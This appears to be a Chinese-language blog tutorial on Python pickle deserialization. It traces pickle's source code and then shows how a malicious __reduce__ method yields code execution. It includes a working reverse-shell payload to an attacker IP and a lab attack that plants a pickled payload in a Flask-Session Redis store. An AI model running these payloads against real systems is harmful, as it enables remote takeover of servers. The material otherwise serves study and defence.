0%

python序列化与反序列化

python序列化与反序列化以及实战利用

  1. Python序列化与反序列化

Python序列化一般由cPickle和pickle两个库实现,而pickle一般会自带

cPickle是用C编写的,所以它的速度可以比pickle快1000倍。但是它不支持Pickler()和Unpickler()类的子类化

“Pickling”是将Python对象层次结构转换为字节流的过程, “unpickling”是反向操作,从而将字节流(来自二进制文件或类似字节的对象)转换回对象层次结构。pickle模块对于错误或恶意构造的数据是不安全的。

一、pickle基本用法

1
2
3
4
5
# -*- coding: utf-8 -*-
import pickle
a='1234'
with open ('test1.txt','wb') as f:
pickle.dump(a,f)

test1.txt

二、源码分析
序列化
Pickle最开始定义了常量 协议号和标志位
HIGHEST_PROTOCOL = 4
DEFAULT_PROTOCOL = 3
STOP = b’.’
PROTO = b’\x80’

初始化函数中传递了一些变量值

1
2
3
4
5
  if protocol is None:
protocol = DEFAULT_PROTOCOL
if protocol < 0:
protocol = HIGHEST_PROTOCOL
self.proto = int(protocol)

跟进dump函数

1
2
3
4
5
6
7
if self.proto >= 2:
self.write(PROTO + pack("<B", self.proto))
if self.proto >= 4:
self.framer.start_framing()
self.save(obj)
self.write(STOP)
self.framer.end_framing()

继续跟进save函数
以下简化部分代码,仅显示与序列化过程有关的代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
  def save(self, obj, save_persistent_id=True):
t = type(obj)
# Check the type dispatch table
t = type(obj)
f = self.dispatch.get(t)
if f is not None:
f(self, obj) # Call unbound method with explicit self
return
# Check private dispatch table if any, or else copyreg.dispatch_table
reduce = getattr(self, 'dispatch_table', dispatch_table).get(t)
if reduce is not None:
rv = reduce(obj)
else:
# Check for a class with a custom metaclass; treat as regular class
try:
issc = issubclass(t, type)
except TypeError: # t is not a class (old Boost; see SF #502085)
issc = False
if issc:
self.save_global(obj)
return

这里根据序列化对象的类型有不同的调度器,输出一下dispatch看得更清楚

1
{<class 'NoneType'>: <function _Pickler.save_none at 0x00000212FF863268>, <class 'bool'>: <function _Pickler.save_bool at 0x00000212FF8632F0>, <class 'int'>: <function _Pickler.save_long at 0x00000212FF863378>, <class 'float'>: <function _Pickler.save_float at 0x00000212FF863400>, <class 'bytes'>: <function _Pickler.save_bytes at 0x00000212FF863488>, <class 'str'>: <function _Pickler.save_str at 0x00000212FF863510>, <class 'tuple'>: <function _Pickler.save_tuple at 0x00000212FF863598>, <class 'list'>: <function _Pickler.save_list at 0x00000212FF863620>, <class 'dict'>: <function _Pickler.save_dict at 0x00000212FF863730>, <class 'set'>: <function _Pickler.save_set at 0x00000212FF863840>, <class 'frozenset'>: <function _Pickler.save_frozenset at 0x00000212FF8638C8>, <class 'function'>: <function _Pickler.save_global at 0x00000212FF863950>, <class 'type'>: <function _Pickler.save_type at 0x00000212FF8639D8>}

本例的对象为字符串类型,调用save_str函数
跟进save_str函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
if self.bin:
encoded = obj.encode('utf-8', 'surrogatepass')
n = len(encoded)
if n <= 0xff and self.proto >= 4:
self.write(SHORT_BINUNICODE + pack("<B", n) + encoded)
elif n > 0xffffffff and self.proto >= 4:
self._write_large_bytes(BINUNICODE8 + pack("<Q", n), encoded)
elif n >= self.framer._FRAME_SIZE_TARGET:
self._write_large_bytes(BINUNICODE + pack("<I", n), encoded)
else:
self.write(BINUNICODE + pack("<I", n) + encoded)
else:
obj = obj.replace("\\", "\\u005c")
obj = obj.replace("\n", "\\u000a")
self.write(UNICODE + obj.encode('raw-unicode-escape') +
b'\n')
self.memoize(obj)

所以pickle对 对象序列化的流程大致如下

  1. 初始化_Pickler类,进行一些中间变量的赋值,写头标志位
  2. 调用类中save函数,确定传入对象的类型并使用相应函数处理(save_str、save_long……)
  3. 将结果写入内存,并加上STOP尾标志位

但如果第二部查询调度器并没有查询到对应的方法,即对象的type不在NoneType/bool/builtin/classobj/dict/float/function/instance/int/list/long/str/tuple/type/unicode这些类型中的时候,首先查看是否存在reduce_ex,如果存在则不再查找reduce,不存在的话则继续查找reduce;进而判断该函数返回值是string还是tuple,前者进入save_global;后者进入危险开始的save_reduce函数。

定义的类对象不在dispatch中的情况(恶意对象):

1
2
3
4
5
6
7
8
9
10
11
import pickle
import os
class A():
def __reduce__(self):
a = 'whoami'
return (os.system,(a,))

a="test"
print (pickle._Pickler.dispatch.get(type(a)))
print (pickle._Pickler.dispatch.get(type(A)))
print (pickle._Pickler.dispatch.get(type(A())))
1
2
3
<function _Pickler.save_str at 0x000001FD12C93510>
<function _Pickler.save_type at 0x000001FD12C939D8>
None

save_global函数

1
2
3
4
5
6
7
8
9
10
11
# Check for a __reduce_ex__ method, fall back to __reduce__
reduce = getattr(obj, "__reduce_ex__", None)
if reduce is not None:
rv = reduce(self.proto)
else:
reduce = getattr(obj, "__reduce__", None)
if reduce is not None:
rv = reduce()
else:
raise PicklingError("Can't pickle %r object: %r" %
(t.__name__, obj))

save_reduce会将reduce返回的tuple结果,调用save_tuple方法进行序列化存储
恶意对象序列化后的结果为
b’\x80\x03cnt\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.’

反序列化
反序列化的过程也很好理解,如下
这里以上边的恶意对象为例
跟进load函数,读取第一个字符并分配调度器,
key = read(1)
dispatchkey[0]
第一个字符为c,调度器分配函数load_global来处理。

1
(99: <function _Unpickler.load_global at 0x00000212FF865488>)

Load_global函数

1
2
3
4
5
 module = self.readline()[:-1].decode("utf-8")   #读取第一行剩下的nt作为module
name = self.readline()[:-1].decode("utf-8") #读取第二行的system作为name
klass = self.find_class(module, name) #将module和name传入klass
self.append(klass)
dispatch[GLOBAL[0]] = load_global

find_class函数

1
2
3
def find_class(self, module, name):
__import__(module, level=0)
return getattr(sys.modules[module], name)

find_class函数返回system方法,并在load_global函数中压入栈,并在load_reduce函数中取出方法和参数执行恶意代码

1
2
3
4
5
def load_reduce(self):
stack = self.stack
args = stack.pop()
func = stack[-1]
stack[-1] = func(*args)

三、具体利用

靶机执行如下代码

1
2
3
4
5
6
7
8
import pickle
import os
class A(object):
def __reduce__(self):
a = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.128",9000));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"""
return (os.system,(a,))
result = pickle.dumps(A())
pickle.loads(result)

攻击机获得shell

四、实战
例1 https://segmentfault.com/a/1190000013099825
flask中默认使用客户端session,如果想要配置服务端session,就需要使用flask_session配合Redis,而flask_session对session的序列化是通过pickle实现的

如果redis存在未授权或弱口令,使得我们可以修改session,便可以任意代码执行

服务器:ubuntu 1604 10.10.10.130
攻击机:kali linux 10.10.10.128

服务器端代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import redis
import os
from flask import Flask,session
from flask_session import Session
app = Flask(__name__)
SESSION_TYPE = 'redis'
SESSION_PERMANENT = False
SESSION_USE_SIGNER = False
SESSION_KEY_PREFIX = 'session'
SESSION_REDIS = redis.Redis(host='127.0.0.1',port='6379')
SESSION_COOKIE_HTTPONLY = True
PERMANENT_SESSION_LIFETIME = 604800 # 7 days
app.config.from_object(__name__)
Session(app)

@app.route('/')
def hello_world():
session['name']='test'
return 'Hello World!'

if __name__ == '__main__':
app.run(host='0.0.0.0')

访问服务器生产的session

在redis中查询session

修改session

1
2
3
4
5
6
7
8
9
10
11
import pickle
import os
import redis
class A(object):
def __reduce__(self):
a = """python3 -c 'import socket,subprocess,os;s=socket.socket(socket.A$
return (os.system,(a,))
b=A()
result = pickle.dumps(b)
r = redis.Redis(host='10.10.10.130,port=6379,password='123456')
r.set('session7ed80af9-014f-45ea-9349-8b3aba0584b1',result)

刷新浏览器getshell

四、问题

本文所分析的pickle为python3.x自带的,与python2.x有一部分出入:
1.协议版本源码处理略有不同
2.因为python2和python3在新式类和经典类方面的区别,造成如下情况:
在python2中必须显式继承object,即为新式类才能进入save_reduce函数,否则无法执行
而在python3中,因为没有新式类经典类的区别,就不需要显示继承object了

https://segmentfault.com/a/1190000013099825
https://segmentfault.com/a/1190000013214956
https://www.cnblogs.com/baby-lily/p/10990026.html